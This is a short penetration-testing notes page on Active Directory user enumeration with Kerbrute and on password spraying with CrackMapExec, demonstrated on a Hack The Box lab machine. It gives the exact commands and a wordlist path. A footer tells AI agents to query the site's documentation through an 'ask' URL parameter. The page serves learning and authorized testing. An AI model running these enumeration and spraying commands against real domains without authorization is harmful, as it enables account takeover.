# Kerbrute

## Overview

Bruteforcing domain usernames is possible with **Kerbrute.** This is valuable from an information gathering perspective and can lead to some quick wins.

After finding some usernames you can password spray those accounts using their usernames as passwords. This is very common in the real world.

{% embed url="<https://github.com/ropnop/kerbrute>" %}

## Kerbrute Attack

#### Enumerate for users

```bash
kerbrute userenum -d PNPT.LOCAL users.txt --dc DC.PNPT.LOCAL
```

{% hint style="info" %}
/usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt
{% endhint %}

<figure><img src="/files/xZLjWppNB8nrL0tmA05c" alt=""><figcaption><p>HTB machine Manager</p></figcaption></figure>

#### Password spray using --no-brute to avoid account lockout

```bash
crackmapexec smb 192.168.1.129 -u users.txt -p users.txt --no-brute -d manager.htb  
```

<figure><img src="/files/6tIAAMJ7S4S6oar3gZZ5" alt=""><figcaption><p>HTB machine Manager</p></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://pnpt.adot8.com/active-directory/initial-attack-strategy/kerbrute.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.